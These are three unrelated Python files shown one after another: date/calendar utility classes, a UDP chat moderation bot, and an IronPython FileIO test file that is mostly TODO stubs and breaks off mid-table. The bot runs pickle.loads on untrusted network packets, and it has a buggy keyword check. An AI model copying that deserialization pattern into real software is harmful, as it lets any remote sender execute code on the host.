self.date= _datetime.date(year,month,day)
self.year=year; self.month=month; self.day=day
self.time= (hour,minute,second)
self.hour=hour; self.minute=minute; self.second=second
self.weekday= date_time.get_weekday(self.year,self.month,self.day)
self.weekday_name= date_time.get_weekday(self.year,self.month,self.day,True)
self.week_nom= date_time.get_weeknom(self.year,self.month,self.day)
#self.first_week_day= first_week_day
_calendar.setfirstweekday(first_week_day)
self.calendar= str(_calendar.month(year, month)).replace(str(day),style(str(day),'green').content)
self.calendar_month= str(_calendar.month(year, month))
self.calendar_year_all=str(_calendar.calendar(year))
self.calendar_year= [_calendar.month(year,i) for i in range(1,13)]
self.calendar_next_all= [_calendar.month(year,i) for i in range(self.month+1,13)]
self.calendar_prev_all= [_calendar.month(year,i) for i in range(1,self.month)]
self.calendar_position_next_year= str(_calendar.month(year+1, month)).replace(str(day),style(str(day),'green').content)
self.calendar_position_prev_year= str(_calendar.month(year-1, month)).replace(str(day),style(str(day),'green').content)
def setfirstweekday(self,day):
if type(day)==int and day<7:
date_time.Weekday_Names= date_time.Weekday_Names[day:]+date_time.Weekday_Names[:day]
elif type(day)==str:
day= date_time.Weekday_Names.index(day)
date_time.Weekday_Names= date_time.Weekday_Names[day:]+date_time.Weekday_Names[:day]
else:
if type(day)==int:
raise ValueError('Invalid Nomber. Day number should be in range(7)')
else:
raise TypeError(f"Inappropriate Type For 'day'. day can be 'str' or 'int' not {type(day)}")
_calendar.setfirstweekday(day)
self.calendar= str(_calendar.month(self.year, self.month)).replace(str(day),style(str(day),'green').content)
self.calendar_month= str(_calendar.month(self.year, self.month))
self.calendar_year_all=str(_calendar.calendar(self.year))
self.calendar_year= [_calendar.month(self.year,i) for i in range(1,13)]
self.calendar_next_all= [_calendar.month(self.year,i) for i in range(self.month+1,13)]
self.calendar_prev_all= [_calendar.month(self.year,i) for i in range(1,self.month)]
self.calendar_position_next_year= str(_calendar.month(self.year+1, self.month)).replace(str(day),style(str(day),'green').content)
self.calendar_position_prev_year= str(_calendar.month(self.year-1, self.month)).replace(str(day),style(str(day),'green').content)
self.weekday= date_time.get_weekday(self.year,self.month,self.day)
self.weekday_name= date_time.get_weekday(self.year,self.month,self.day,True)
self.week_nom= date_time.get_weeknom(self.year,self.month,self.day)
@staticmethod
def today():
dt = date_time.NOW()
return (dt.year,dt.month,dt.day)
@staticmethod
def calender_year(year=_NOW_YEAR):
if not year: year=date_time.NOW().year
return [_calendar.month(year,i) for i in range(1,13)]
@staticmethod
def calendar_month_st(month=_NOW_MONTH,year=_NOW_YEAR,day=0):
year,month = date_time.normalize([year,month])[0]
if not day:
return str(_calendar.month(year, month))
else:
return str(_calendar.month(year, month)).replace(str(day),style(str(day),'green').content)
@staticmethod
def passed_date(f_date,l_date=_NOW,return_time='day'):
if not l_date: l_date=date_time.NOW()
f_date = _datetime.datetime(*f_date)
return_time= return_time.lower()
if return_time in ('day','month','year','hour','minute','second'):
DELTA= l_date - f_date
if return_time == 'year':
try:
_return = _re.search(r'(?P<X>(-)?\w+) day',str(DELTA/365)).group('X')
except:
_return = None
#_return = str(DELTA/365)
elif return_time == 'month':
_return = _re.search(r'\w+',str(DELTA/30)).group()
elif return_time == 'day':
_return = str(DELTA)[:-14]
elif return_time =='hour':
_return = str(DELTA*24)[:-14]
elif return_time == 'minute':
_return = str(DELTA*1440)[:-14]
elif return_time == 'second':
_return = str(DELTA*3600)[:-14]
if _return: return _return
else: return 0
else:
raise ValueError("return_time should be in ('year', 'month', 'day', 'hour', 'minute', 'second')")
passed_time = passed_date
'''@staticmethod
def passed_time(year=1970,month=1,day=1,hour=0,minute=0,second=0,return_time='second'):
pass'''
@staticmethod
def convert_epoch_to_local(second=_time.time()):
return _time.ctime(second)
@staticmethod
def get_weekday(year=_NOW_YEAR,month=_NOW_MONTH,day=_NOW_DAY,return_name=False):
"""
First day is Monday and the numbers starts from 0
"""
year,month,day = date_time.normalize([year,month,day])[0]
if return_name:
return date_time.Weekday_Names[_datetime.date(year,month,day).weekday()]
else:
return _datetime.date(year,month,day).weekday()
@staticmethod
def get_weeknom(year=_NOW_YEAR,month=_NOW_MONTH,day=_NOW_DAY):
"""
Returns 53 if First week is from last year
"""
year,month,day = date_time.normalize([year,month,day])[0]
return _datetime.date(year,month,day).isocalendar()[1]
@staticmethod
def calendar_show_week(week_nom,year=_NOW_YEAR):
year = date_time.normalize([year])[0][0]
week= week_nom
for i in list(range(1,8))[::-1]:
if date_time.get_weeknom(year,1,i)==1:
FIRST_WEEK_DAYS= len(list(range(i)))
break
day= (week-1)*7 - (6-FIRST_WEEK_DAYS)
mnth= 1
true=False
while not true:
try:
if _calendar.monthrange(year,mnth)[1]<day:
mnth+=1
day-= _calendar.monthrange(year,mnth)[1]
else:
true= True
except _calendar.IllegalMonthError:
class BadWeekNumber(Exception):
def __init__(self, message='Week Number is Higher Than Year Weeks.'): super().__init__(message)
raise BadWeekNumber from None
new= date_time(year,mnth,day)
cal= new.calendar_month.splitlines()
for item in cal:
if str(new.day) in item and item != cal[0]:
INDEX= cal.index(item);COLORED_WEEK= style(item,'green');break
WEEK_WITH_COLOR= '\n'.join(cal[:INDEX]+[str(COLORED_WEEK)]+cal[INDEX+1:])
return WEEK_WITH_COLOR
@staticmethod
def get_year():
return _time.localtime().tm_year
@staticmethod
def get_month():
return _time.localtime().tm_mon
@staticmethod
def get_day_of_month():
return _time.localtime().tm_mday
@staticmethod
def get_day_of_week():
return _time.localtime().tm_wday
@staticmethod
def get_day_of_year():
return _time.localtime().tm_yday
@staticmethod
def get_hour():
return _time.localtime().tm_hour
@staticmethod
def get_minute():
return _time.localtime().tm_min
@staticmethod
def get_second():
return _time.localtime().tm_sec
date_time = DateTime
_Auto = 0
class _Lang:
class Constant:
def __new__(cls,*args,array=True):
cls._init = False
return super(_Lang.Constant, cls).__new__(cls)
def __init__(self,*args,array=True):
'''
if array:
self.__members = args
else:
if len(args) > 1:
raise ValueError
self.__members = args[0]
'''
self.__members = args
self._init = True
def __str__(self):
#if len(self.__members) > 1:
return '<'+str(self.__members)[1:-1]+'>' #‹›
#return self.__members
def __repr__(self):
return '<'+str(self.__members)[1:-1]+'>'
def __setattr__(self,_attr,value):
if self._init:
raise AttributeError(f"'Constant' object does not support item assignment")
else:
super(_Lang.Constant,self).__setattr__(_attr,value)
def __getitem__(self,index):
return self.__members[index]
def __contains__(self,obj):
return obj in self.__members
def __bool__(self):
return bool(len(self.__members))
#'''
def __hash__(self):
return hash(tuple(['Constant',len(self)]+list(self.__members)))
#'''
def __len__(self):
#if type(self.__members) == tuple:
return len(self.__members)
def _dict_getter(self):
raise AttributeError("Conatant object has no attribute '__dict__'")
#return {}
__dict__ = property(_dict_getter)
def __dir__(self):
ret = list(super().__dir__())#[:-2]
ret.remove('_init')
ret.remove('_dict_getter')
return ret
const = Const = constant = Constant
class Array:
# Sized Array
__Type_Error = "Array of type '{}' does not accept object with type '{}'"
def __init__(self,*args,type_=_Auto,size=_Auto):
self.__members = []
if type_:
self.__TYPE = type_
else:
self.__TYPE = type(args[0])
self.__TYPE_NAME = self.__TYPE.__name__
if size:
self.__SIZE = size
else:
self.__SIZE = len(args)
for obj in args:
if type(obj) == self.__TYPE:
self.__members.append(obj)
else:
raise ValueError(_Lang.Array.__Type_Error.format(self.__TYPE_NAME,type(obj).__name__))
def __str__(self):
return '{'+str(self.__members)[1:-1]+'}' #‹›
def __repr__(self):
return '{'+str(self.__members)[1:-1]+'}'
def __getitem__(self,index):
return self.__members[index]
def __contains__(self,obj):
return obj in self.__members
def __bool__(self):
return bool(len(self.__members))
def __len__(self):
return len(self.__members)
def __setitem__(self,index,obj):
if type(obj) == self.__TYPE:
self.__members.insert(index,obj)
return
raise ValueError(_Lang.Array.__Type_Error.format(self.__TYPE_NAME,type(obj).__name__))
def insert(self,index,obj):
if type(obj) == self.__TYPE:
self.__members.insert(index,obj)
return
raise ValueError(_Lang.Array.__Type_Error.format(self.__TYPE_NAME,type(obj).__name__))
def append(self,obj):
if type(obj) == self.__TYPE:
self.__members.append(obj)
return
raise ValueError(_Lang.Array.__Type_Error.format(self.__TYPE_NAME,type(obj).__name__))
add = append
def remove(self,obj):
self.__members.remove(obj)
def pop(self,index=-1):
self.__members.pop(index)
array = Array
class Types:
Str = str
Int = int
Float = float
Set = set
Tuple = tuple
Dict = dict
List = list
Bool = bool
Bytes = bytes
Class = type
Type = type
Object = object
Lambda = type(lambda: None)
Function = Lambda #type(lambda: None)
#Constant = type(_Lang.Constant(1))
#Array = type(_Lang.Array(1,1))
Any = type#_typing.Any
Callable = _typing.Callable
Container = _typing.Container
Generator = Lambda #type(_f) #Not Built-in(s) #_types.GeneratorType || _typing.Generator
Iterable = _typing.Iterable
Iterator = _typing.Iterator
NoReturn = _typing.NoReturn
Optional = _typing.Optional
BuiltinFunction = type(len)
BuiltinMethod = type([].append)
Module = type(_typing)
Method = type(globals()['Tuple']().force)
#Mapping = _typing.Mapping
#OrderedDict = _typing.OrderedDict
#Text = str
#Union = _typing.Union
#_types.AsyncGeneratorType
types = Types
#setattr(_Lang,'Const',type(_Lang.Constant(1)))
#setattr(_Lang,'Array',type(_Lang.Array(1,1)))
#END
|
chat_bot.py
|
import socket
import pickle
import time
from threading import Thread
from Crypto.Hash import SHA1
from pythonping import ping
class Bot:
def __init__(self, port, options=None, botName=None):
self.addr = ''
self.port = int(port)
self.udpSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self.udpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.badWords = ['ass', 'asshole', 'shit', 'fuck', 'dick', 'bastard', 'retard', 'whore']
self.user = botName
self.options = []
self.warnCount = []
self.messageTracker = []
self.found = False
hashed = SHA1.new()
hashed.update(self.user.encode('utf-8'))
for option in options:
self.options.append(int(option))
print(f"{self.user}'s Configuration:")
print("Token:", hashed.hexdigest())
print("Permissions enabled:", options)
print("Status: ready")
def receive(self):
while True:
data, address = self.udpSocket.recvfrom(1024)
deserialized_data = pickle.loads(data)
self.found = False
for i in range(len(self.warnCount)):
if self.found:
break
elif self.warnCount[i][0] == address[0]:
self.found = True
break
if not self.found:
self.warnCount.append([address[0], 0])
for word in deserialized_data['message'].split(' '):
if deserialized_data['message'].split(' ')[0] == f'>{self.user}':
break
elif deserialized_data['message'][-6:] == 'joined' and 1 in self.options:
hashed = SHA1.new()
msg = 'Welcome to the channel!'
msg = f'>{self.user} ' + msg
hashed.update(msg.encode('utf-8'))
messageAndHash = {'hash': hashed.hexdigest(), 'message': msg}
self.broadcast(pickle.dumps(messageAndHash))
self.messageTracker.append([address, time.perf_counter()])
break
elif word in self.badWords and 2 in self.options:
hashed = SHA1.new()
msg = "You cant say that here!"
msg = f'>{self.user} ' + msg
hashed.update(msg.encode('utf-8'))
messageAndHash = {'hash': hashed.hexdigest(), 'message': msg}
self.broadcast(pickle.dumps(messageAndHash))
if 3 in self.options:
for i in range(len(self.warnCount)):
if address[0] in self.warnCount[i]:
self.warnCount[i][1] += 1
if self.warnCount[i][1] >= 3:
hashed = SHA1.new()
msg = "You have been banned from the server"
msg = f'>{self.user} ' + msg
hashed.update(msg.encode('utf-8'))
messageAndHash = {'hash': hashed.hexdigest(), 'message': msg}
self.broadcast(pickle.dumps(messageAndHash))
elif 'compute' and 'response' in deserialized_data['message'].split(' ') and 4 in self.options:
r = ping(address[0])
hashed = SHA1.new()
msg = f'Avg RTT for you is {r.rtt_avg/2} seconds'
msg = f'>{self.user} ' + msg
hashed.update(msg.encode('utf-8'))
messageAndHash = {'hash': hashed.hexdigest(), 'message': msg}
self.broadcast(pickle.dumps(messageAndHash))
break
if 5 in self.options:
for j in range(len(self.messageTracker)):
if address in self.messageTracker[j]:
if (time.perf_counter() - self.messageTracker[j][1]) > 300:
hashed = SHA1.new()
msg = "You have been gone over 5 minutes, consider disconnecting"
msg = f'>{self.user} ' + msg
hashed.update(msg.encode('utf-8'))
messageAndHash = {'hash': hashed.hexdigest(), 'message': msg}
self.broadcast(pickle.dumps(messageAndHash))
break
else:
self.messageTracker[j][1] = time.perf_counter()
break
# if user not found, default case, should be appended when connecting though
self.messageTracker.append([address, time.perf_counter()])
def listen(self):
self.receive()
def broadcast(self, msg, toItself=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) # set socket to broadcast with flag
sock.sendto(msg, ('<broadcast>', self.port))
if toItself:
self.listen()
def run(self):
print(f'\n#{self.user} has joined the chat\n')
thread = Thread(target=self.listen)
thread.start()
def setPort(self, port):
self.port = port
self.udpSocket.bind((self.addr, int(self.port)))
|
test__fileio.py
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
'''
Tests for CPython's _fileio module.
'''
import os
import sys
import time
import threading
import unittest
from _io import FileIO
from iptest import run_test
TEMP_READINTO_NAME = "_fileio__FileIO_readinto%d.tmp"
def bytesio_helper():
return (bytes(bytearray(b'')),
bytes(bytearray(b'a')),
bytes(bytearray(b'ab')),
bytes(bytearray(b'abc')),
bytes(bytearray(b'abcd')),
bytes(bytearray(b'abcde')),
bytes(bytearray(b'abcdef')),
bytes(bytearray(b'abcdefg')),
bytes(bytearray(b'abcdefgh')),
bytes(bytearray(b'abcdefghi'))
)
def fileio_helper():
bytes_io_list = bytesio_helper()
file_io_list = []
for i in range(len(bytes_io_list)):
with FileIO(TEMP_READINTO_NAME % i, "w") as f:
f.write(bytes_io_list[i])
file_io_list.append(FileIO(TEMP_READINTO_NAME % i, "r"))
return file_io_list
class FileIOTest(unittest.TestCase):
def test__FileIO___class__(self):
'''
TODO
'''
pass
def test__FileIO___delattr__(self):
'''
TODO
'''
pass
def test__FileIO___doc__(self):
'''
TODO
'''
pass
def test__FileIO___format__(self):
'''
TODO
'''
pass
def test__FileIO___getattribute__(self):
'''
TODO
'''
pass
def test__FileIO___hash__(self):
'''
TODO
'''
pass
def test__FileIO___init__(self):
'''
TODO
'''
pass
def test__FileIO___new__(self):
'''
TODO
'''
pass
def test__FileIO___reduce__(self):
'''
TODO
'''
pass
def test__FileIO___reduce_ex__(self):
'''
TODO
'''
pass
def test__FileIO___repr__(self):
'''
TODO
'''
pass
def test__FileIO___setattr__(self):
'''
TODO
'''
pass
def test__FileIO___sizeof__(self):
'''
TODO
'''
pass
def test__FileIO___str__(self):
'''
TODO
'''
pass
def test__FileIO___subclasshook__(self):
'''
TODO
'''
pass
def test__FileIO_close(self):
'''
TODO
'''
pass
def test__FileIO_closed(self):
'''
TODO
'''
pass
def test__FileIO_closefd(self):
'''
TODO
'''
pass
def test__FileIO_fileno(self):
'''
TODO
'''
pass
def test__FileIO_isatty(self):
'''
TODO
'''
pass
def test__FileIO_mode(self):
'''
TODO
'''
pass
def test__FileIO_read(self):
'''
TODO
'''
pass
def test__FileIO_readable(self):
'''
TODO
'''
pass
def test__FileIO_readall(self):
r, w = os.pipe()
wf = FileIO(w, 'w')
def writefile():
time.sleep(0.05)
wf.write(bytes(bytearray(b'abc')))
wf.close()
wf.write(bytes(bytearray(b'abc\n')))
t = threading.Thread(target=writefile)
t.start()
with FileIO(r, 'r') as rf:
self.assertEqual(rf.readall(), b'abc\nabc')
t.join()
def test__FileIO_readinto(self):
'''
TODO
'''
pass
def test__FileIO_seek(self):
'''
TODO
'''
pass
def test__FileIO_seekable(self):
'''
TODO
'''
pass
def test__FileIO_tell(self):
'''
TODO
'''
pass
def test__FileIO_truncate(self):
'''
TODO
'''
pass
def test__FileIO_writable(self):
'''
TODO
'''
pass
def test__FileIO_write(self):
'''
TODO
'''
pass
def test_coverage(self):
'''
Test holes as found by code coverage runs. These need to be refactored and
moved to other functions throughout this module (TODO).
'''
#--FileIO.readinto(array.array(...))
import array
readinto_cases = [
[('b',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('b',[0]),
[[0],[97],[97],[97],[97],[97],[97],[97],[97],[97]],
[0,1,1,1,1,1,1,1,1,1]],
[('b',[0,-1]),
[[0,-1],[97,-1],[97,98],[97,98],[97,98],[97,98],[97,98],[97,98],[97,98],[97,98]],
[0,1,2,2,2,2,2,2,2,2]],
[('b',[0,1,2]),
[[0,1,2],[97,1,2],[97,98,2],[97,98,99],[97,98,99],[97,98,99],[97,98,99],[97,98,99],[97,98,99],[97,98,99]],
[0,1,2,3,3,3,3,3,3,3]],
[('b',[0,1,2,3,4,5,6]),
[[0,1,2,3,4,5,6],[97,1,2,3,4,5,6],[97,98,2,3,4,5,6],[97,98,99,3,4,5,6],[97,98,99,100,4,5,6],[97,98,99,100,101,5,6],[97,98,99,100,101,102,6],[97,98,99,100,101,102,103],[97,98,99,100,101,102,103],[97,98,99,100,101,102,103]],
[0,1,2,3,4,5,6,7,7,7]],
[('b',[0,1,2,3,4,5,6,7]),
[[0,1,2,3,4,5,6,7],[97,1,2,3,4,5,6,7],[97,98,2,3,4,5,6,7],[97,98,99,3,4,5,6,7],[97,98,99,100,4,5,6,7],[97,98,99,100,101,5,6,7],[97,98,99,100,101,102,6,7],[97,98,99,100,101,102,103,7],[97,98,99,100,101,102,103,104],[97,98,99,100,101,102,103,104]],
[0,1,2,3,4,5,6,7,8,8]],
[('b',[0,1,2,3,4,5,6,7,8]),
[[0,1,2,3,4,5,6,7,8],[97,1,2,3,4,5,6,7,8],[97,98,2,3,4,5,6,7,8],[97,98,99,3,4,5,6,7,8],[97,98,99,100,4,5,6,7,8],[97,98,99,100,101,5,6,7,8],[97,98,99,100,101,102,6,7,8],[97,98,99,100,101,102,103,7,8],[97,98,99,100,101,102,103,104,8],[97,98,99,100,101,102,103,104,105]],
[0,1,2,3,4,5,6,7,8,9]],
[('b',[0,1,2,3,4,5,6,7,8,9]),
[[0,1,2,3,4,5,6,7,8,9],[97,1,2,3,4,5,6,7,8,9],[97,98,2,3,4,5,6,7,8,9],[97,98,99,3,4,5,6,7,8,9],[97,98,99,100,4,5,6,7,8,9],[97,98,99,100,101,5,6,7,8,9],[97,98,99,100,101,102,6,7,8,9],[97,98,99,100,101,102,103,7,8,9],[97,98,99,100,101,102,103,104,8,9],[97,98,99,100,101,102,103,104,105,9]],
[0,1,2,3,4,5,6,7,8,9]],
[('B',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('B',[0,1]),
[[0,1],[97,1],[97,98],[97,98],[97,98],[97,98],[97,98],[97,98],[97,98],[97,98]],
[0,1,2,2,2,2,2,2,2,2]],
[('u',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('u',''),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('h',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('h',[1,2]),
[[1,2],[97,2],[25185,2],[25185,99],[25185,25699],[25185,25699],[25185,25699],[25185,25699],[25185,25699],[25185,25699]],
[0,1,2,3,4,4,4,4,4,4]],
[('H',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('H',[]),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('H',[49]),
[[49],[97],[25185],[25185],[25185],[25185],[25185],[25185],[25185],[25185]],
[0,1,2,2,2,2,2,2,2,2]],
[('H',[2,3]),
[[2,3],[97,3],[25185,3],[25185,99],[25185,25699],[25185,25699],[25185,25699],[25185,25699],[25185,25699],[25185,25699]],
[0,1,2,3,4,4,4,4,4,4]],
[('i',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('I',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('l',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('L',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('f',[]),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
[('d',),
[[],[],[],[],[],[],[],[],[],[]],
[0,0,0,0,0,0,0,0,0,0]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24303
[('u','z'),
[['z'],['a'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261']],
[0,1,2,2,2,2,2,2,2,2]],
[('u','az'),
[['a','z'],['a','z'],['\u6261','z'],['\u6261','c'],['\u6261','\u6463'],['\u6261','\u6463'],['\u6261','\u6463'],['\u6261','\u6463'],['\u6261','\u6463'],['\u6261','\u6463']],
[0,1,2,3,4,4,4,4,4,4]],
[('u','*'),
[['*'],['a'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261'],['\u6261']],
[0,1,2,2,2,2,2,2,2,2]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24316
[('h',[-1]),
[[-1],[-159],[25185],[25185],[25185],[25185],[25185],[25185],[25185],[25185]],
[0,1,2,2,2,2,2,2,2,2]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24316
[('h',[1,-99,47]),
[[1,-99,47],[97,-99,47],[25185,-99,47],[25185,-157,47],[25185,25699,47],[25185,25699,101],[25185,25699,26213],[25185,25699,26213],[25185,25699,26213],[25185,25699,26213]],
[0,1,2,3,4,5,6,6,6,6]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24317
[('i',[1,2]),
[[1,2],[97,2],[25185,2],[6513249,2],[1684234849,2],[1684234849,101],[1684234849,26213],[1684234849,6776421],[1684234849,1751606885],[1684234849,1751606885]],
[0,1,2,3,4,5,6,7,8,8]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24316
[('i',[-1]),
[[-1],[-159],[-40351],[-10263967],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849]],
[0,1,2,3,4,4,4,4,4,4]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24316
[('i',[1,-99,47]),
[[1,-99,47],[97,-99,47],[25185,-99,47],[6513249,-99,47],[1684234849,-99,47],[1684234849,-155,47],[1684234849,-39323,47],[1684234849,-10000795,47],[1684234849,1751606885,47],[1684234849,1751606885,105]],
[0,1,2,3,4,5,6,7,8,9]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24317
[('I',[1]),
[[1],[97],[25185],[6513249],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849]],
[0,1,2,3,4,4,4,4,4,4]],
[('I',[1,999,47]),
[[1,999,47],[97,999,47],[25185,999,47],[6513249,999,47],[1684234849,999,47],[1684234849,869,47],[1684234849,26213,47],[1684234849,6776421,47],[1684234849,1751606885,47],[1684234849,1751606885,105]],
[0,1,2,3,4,5,6,7,8,9]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24317
[('l',[1,2]),
[[1,2],[97,2],[25185,2],[6513249,2],[1684234849,2],[1684234849,101],[1684234849,26213],[1684234849,6776421],[1684234849,1751606885],[1684234849,1751606885]],
[0,1,2,3,4,5,6,7,8,8]],
[('l',[-1]),
[[-1],[-159],[-40351],[-10263967],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849]],
[0,1,2,3,4,4,4,4,4,4]],
[('l',[1,-99,47]),
[[1,-99,47],[97,-99,47],[25185,-99,47],[6513249,-99,47],[1684234849,-99,47],[1684234849,-155,47],[1684234849,-39323,47],[1684234849,-10000795,47],[1684234849,1751606885,47],[1684234849,1751606885,105]],
[0,1,2,3,4,5,6,7,8,9]],
[('l',[1,-99,47,48]),
[[1,-99,47,48],[97,-99,47,48],[25185,-99,47,48],[6513249,-99,47,48],[1684234849,-99,47,48],[1684234849,-155,47,48],[1684234849,-39323,47,48],[1684234849,-10000795,47,48],[1684234849,1751606885,47,48],[1684234849,1751606885,105,48]],
[0,1,2,3,4,5,6,7,8,9]],
[('l',[1,-99,47,48,49]),
[[1,-99,47,48,49],[97,-99,47,48,49],[25185,-99,47,48,49],[6513249,-99,47,48,49],[1684234849,-99,47,48,49],[1684234849,-155,47,48,49],[1684234849,-39323,47,48,49],[1684234849,-10000795,47,48,49],[1684234849,1751606885,47,48,49],[1684234849,1751606885,105,48,49]],
[0,1,2,3,4,5,6,7,8,9]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24318
[('L',[100000000]),
[[100000000],[100000097],[99967585],[90399329],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849],[1684234849]],
[0,1,2,3,4,4,4,4,4,4]],
[('L',[1,99,47]),
[[1,99,47],[97,99,47],[25185,99,47],[6513249,99,47],[1684234849,99,47],[1684234849,101,47],[1684234849,26213,47],[1684234849,6776421,47],[1684234849,1751606885,47],[1684234849,1751606885,105]],
[0,1,2,3,4,5,6,7,8,9]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24319
[('f',[3.1415926535897931]),
[[3.1415927410125732],[3.1415636539459229],[3.1466295719146729],[3.5528795719146729],[1.6777999408082104e+22],[1.6777999408082104e+22],[1.6777999408082104e+22],[1.6777999408082104e+22],[1.6777999408082104e+22],[1.6777999408082104e+22]],
[0,1,2,3,4,4,4,4,4,4]],
[('f',[1.0,3.1400000000000001,0.997]),
[[1.0,3.1400001049041748,0.99699997901916504],[1.0000115633010864,3.1400001049041748,0.99699997901916504],[1.0030022859573364,3.1400001049041748,0.99699997901916504],[0.88821989297866821,3.1400001049041748,0.99699997901916504],[1.6777999408082104e+22,3.1400001049041748,0.99699997901916504],[1.6777999408082104e+22,3.1399776935577393,0.99699997901916504],[1.6777999408082104e+22,3.1312496662139893,0.99699997901916504],[1.6777999408082104e+22,3.6156246662139893,0.99699997901916504],[1.6777999408082104e+22,4.371022013021617e+24,0.99699997901916504],[1.6777999408082104e+22,4.371022013021617e+24,0.99700027704238892]],
[0,1,2,3,4,5,6,7,8,9]],
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=24319
[('d',[3.1415926535897931]),
[[3.1415926535897931],[3.1415926535898255],[3.1415926535958509],[3.1415926544980697],[3.1415927737073592],[3.1413066714124374],[3.1749980776624374],[187.19987697039599],[8.5408832230361244e+194],[8.5408832230361244e+194]],
[0,1,2,3,4,5,6,7,8,8]],
[('d',[1.0,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004]),
[[1.0,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[1.0000000000000215,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[1.0000000000055922,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[1.0000000014462318,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[1.0000003739752616,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[1.0000966950812187,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[1.0249990388312187,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[0.002856443435217224,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[8.5408832230361244e+194,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004],[8.5408832230361244e+194,3.140000000000033,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004]],
[0,1,2,3,4,5,6,7,8,9]],
[('d',[1.0,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5]),
[[1.0,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[1.0000000000000215,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[1.0000000000055922,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[1.0000000014462318,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[1.0000003739752616,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[1.0000966950812187,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[1.0249990388312187,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[0.002856443435217224,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[8.5408832230361244e+194,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5],[8.5408832230361244e+194,3.140000000000033,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5]],
[0,1,2,3,4,5,6,7,8,9]],
[('d',[1.0,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996]),
